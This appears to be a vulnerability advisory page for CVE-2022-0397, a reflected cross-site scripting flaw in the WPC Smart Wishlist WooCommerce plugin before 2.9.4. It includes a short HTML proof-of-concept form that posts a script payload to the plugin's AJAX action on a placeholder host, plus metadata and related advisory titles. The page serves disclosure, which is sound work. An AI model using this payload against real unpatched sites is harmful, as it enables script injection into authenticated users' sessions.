WPC Smart Wishlist for WooCommerce < 2.9.4 – Reflected Cross-Site Scripting | CVE 2022-0397 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape the key parameter before outputting it back in the wishlist_quickview AJAX action's response (available to any authenticated user), leading to a Reflected Cross-Site Scripting

Proof of Concept

<html>
    <form action="https://example.com/wp-admin/admin-ajax.php?action=wishlist_quickview" method="POST">
        <input type="text" name="key" value='<script>alert(/XSS/);</script>'>
        <input type="submit" value="Send">
    </form>
</html>

The source and destination should use the https:// protocol for the exploit to work on Chrome.

Affects Plugins

woo-smart-wishlist

Fixed in 2.9.4

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website

https://kazet.cc/

Verified

Yes

WPVDB ID

c8091254-1ced-4363-ab7f-5b880447713d

Timeline

Publicly Published

2022-03-01 (about 2 years ago)

Added

2022-03-01 (about 2 years ago)

Last Updated

2022-04-08 (about 2 years ago)

Other

Published

Title

Published

2014-08-01

Title

WP Super Cache 1.3 - trunk/wp-cache.php wp_nonce_url Function URI XSS

Published

2014-05-28

Title

Rezgo Online Booking < 1.8.2 - Multiple XSS

Published

2024-05-07

Title

HT Mega – Absolute Addons For Elementor < 2.5.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via Tooltip & Popover Widget

Published

2020-08-14

Title

Sell Media < 2.4.2 - Unauthenticated Reflected Cross-Site Scripting (XSS)

Published

2021-09-27

Title

WordPress Contact Forms by Cimatti < 1.4.12 - Admin+ Stored Cross-Site Scripting